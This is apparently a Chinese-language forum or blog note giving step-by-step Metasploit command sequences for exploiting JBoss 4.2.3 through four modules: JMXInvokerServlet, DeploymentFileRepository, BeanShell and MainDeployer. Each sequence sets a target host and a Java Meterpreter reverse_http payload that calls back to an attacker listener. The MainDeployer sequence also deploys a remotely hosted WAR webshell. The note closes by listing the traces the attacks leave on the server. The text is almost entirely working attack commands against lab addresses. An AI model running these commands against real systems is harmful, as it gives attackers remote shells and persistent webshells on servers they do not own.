­

MSF中Jboss模組直接利用

  • 2019 年 11 月 20 日
  • 筆記
MSF中Jboss模組直接利用

實驗環境:

Kali linux 2018

Windows server 2008 x64

JBOSS 4.2.3

安全檢測過程:

在MSF中本身自帶一些針對JBOSS漏洞的攻擊模組,本次測試使用的JBOSS版本為4.2.3。

利用JMXInvokerServlet介面:

1 msf5 > use exploit/multi/http/jboss_invoke_deploy

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set targeturi /invoker/JMXInvokerServlet (指定 JMXInvokerServlet 介面路徑)

5 msf5 > set target 1

6 msf5 > set payload java/meterpreter/reverse_http 這裡直接用JAVA payload

7 msf5 > set lhost 192.168.174.130

8 msf5 > set lport 110

9 msf5 > exploit

利用deploymentfilerepository服務:

1 msf5 > use exploit/multi/http/jboss_deploymentfilerepository

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set targeturi /jmx‐console

5 msf5 > set verb POST (這裡可以指定不同的請求方法)

6 msf5 > set target 3

7 msf5 > set payloadjava/meterpreter/reverse_http

8 msf5 > set lhost 192.168.174.130

9 msf5 > set lport 110

10 msf5 > exploit

利用BeanShell腳本:

1 msf5 > use exploit/multi/http/jboss_bshdeployer

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set verb POST (這裡可以指定不同的請求方法)

5 msf5 > set target 3

6 msf5 > set payload java/meterpreter/reverse_http

7 msf5 > set lhost 192.168.174.130

8 msf5 > set lport 110

9 msf5 > exploit

利用maindeployer遠程部署webshell:

1 msf5 > exploit/multi/http/jboss_maindeployer

2 msf5 > set rhosts 192.168.174.129

3 msf5 > set rport 8080

4 msf5 > set httppassword admin 如果頁面加了基礎認證,需要加上

5 msf5 > set httpusername admin 帳號密碼

6 msf5 > set srvhost 192.168.174.130 (這裡是提供遠程下載war包的webshell:把jsp的webshell打包成war,然後放在自己的伺服器上,如何打包參考:

http://www.mianhuage.com/649.html)

7 msf5 > set target 3

8 msf5 > set payload java/meterpreter/reverse_http

9 msf5 > set lhost 192.168.174.130

10 msf5 > set lport 7777

11 msf5 > exploit

所留痕迹:

以上所使用的模組攻擊成功後都會在JBOSS目錄:

C:jbos.2.3.gaserverdefaulttemdeploy

留下記錄

作者:暖痕 (文章轉載請註明來自:IT同路人論壇)